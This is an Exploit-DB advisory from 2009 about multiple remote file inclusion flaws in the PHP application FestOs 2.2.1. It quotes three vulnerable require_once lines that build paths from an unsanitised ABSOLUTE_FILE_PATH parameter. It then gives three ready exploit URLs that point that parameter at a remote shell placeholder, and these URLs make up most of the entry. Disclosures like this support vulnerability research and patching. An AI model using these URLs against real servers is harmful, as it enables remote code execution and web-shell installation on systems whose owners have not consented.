FestOs 2.2.1 - Multiple Remote File Inclusions

EDB-ID:

10552

CVE:

N/A


Author:

cr4wl3r

Type:

webapps


Platform:

PHP

Date:

2009-12-19


##################################################################
## Exploit Title: FestOs <= 2.2.1 Multiple RFI Exploit          ##
## Date: 19-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/festos/downloads/list##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################

~ Code : [reports_placement.php]

<?php 
$title = "Jury Sheet Report";

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
   header("Location:index.php");
}
include "includes/reportheader.php";
?>


~ 3xplo!t :

[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]


~ Code : [FestOS.php]

require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");


~ 3xplo!t :

[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]



~ Code : [reportheader.php]

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');


~ 3xplo!t :

[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]


and more...